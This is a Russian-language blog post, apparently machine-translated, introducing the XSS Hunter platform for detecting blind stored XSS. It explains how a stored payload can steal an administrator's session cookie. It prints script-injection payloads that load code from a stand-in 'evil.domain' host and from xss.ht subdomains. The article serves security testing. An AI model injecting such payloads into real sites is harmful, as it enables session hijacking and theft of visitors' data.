XSS Hunter эффективная защита от XSS атак

Screen Shot 2013-01-18 at 3.40.22 PMXSS Хантер это недавно запущенная платформа, которая упрощает организацию и контроль за XSS уязвимостями. С его помощью вы можете запускать все виды атак , но там, где это действительно нужно при проведении атаки Blind XSS.

Атака Blind XSS представляет собой разновидность хранимых или постоянных атак и, как правило, влияет на веб-приложения, что позволяют пользователям хранить данные. Это происходит, когда злоумышленник использует уязвимость, которая позволяет ему сохранить свою полезную нагрузку на стороне сервера (то есть в базе данных), а затем служит с остальной частью содержания пораженной страницы, таким образом, затрагивает всех тех, кто посещает уязвимые веб-страницы.

То, что делает атаки Blind, что, хотя злоумышленник сумел сохранить полезную нагрузку он забывает, где или когда фактическое исполнение эксплоита будет происходить, поскольку есть много целевых источников, которые находятся на общем хранилище данных, обеспечивая полезную нагрузку и разгрузку через приложения или даже сетевые границы.

Администратор форума, после аутентификации, входит в систему в своей панели управления и посещает зараженную страницу, чтобы прочесть очередь комментариев, ожидающих модерации. При посещении зараженной страницы, эксплоит срабатывет, выполняет вредоносный код в своем браузере, крадет его куки-сессию, и предоставляет злоумышленнику права администратора.

Важно отметить, что такого рода атаки не требуют явного нажатия на зловредную ссылку, как это происходит в фишинговых атаках, но срабатывают при простом посещении зараженной страницы; загрузки простого  сценария < script SRC = // evil.domain /> </ script > более чем достаточно.

Это очевидно, что такую атаку с её длинной продолжительностью жизни и скрытном подходе, может быть очень трудно контролировать.

Вот где  выходит на сцену XSS Хантер, бесплатный сервис, предназначенный для использования специалистами по безопасности. XSS Hunter отправляет злоумышленнику уведомление по электронной почте, сообщив ему, что ловушка просто навернулась, и что есть более подробная информация, ожидающия оценки в его панели управления Hunter.

Поток работ четко изложены в целях платформы.

«После регистрации вы создадите специальный xss.ht короткий домен, такой как yoursubdomain.xss.ht, который идентифицирует вашу уязвимость XSS и принимает вашу полезную нагрузку. Затем вы можете использовать этот поддомен в тестировании XSS, используя попытки инъекций, такие как»> < script SRC = // yoursubdomain.xss.ht> </ script >. XSS Hunter будет автоматически обслуживать XSS зонды и собирать полученную информацию, когда они сработают «.

Например, мы раздобыли пользовательского домена https://test1.xss.ht

который теперь может быть использован в полезных нагрузках, таких как:

‘> < script SRC = https: //test1.xss.ht> </ script >’

После доступа к панели, мы получаем экран, который содержит журнал всех событий атак и связанных с ними данных, захваченных из машины жертвы. Эти данные включают IP жертвы, полную страницу, скриншоты содержимого страницы, вызвавшею событие, и отчеты, содержащие различные другие детали.

 

Запись опубликована в рубрике Безопасность. Добавьте в закладки постоянную ссылку.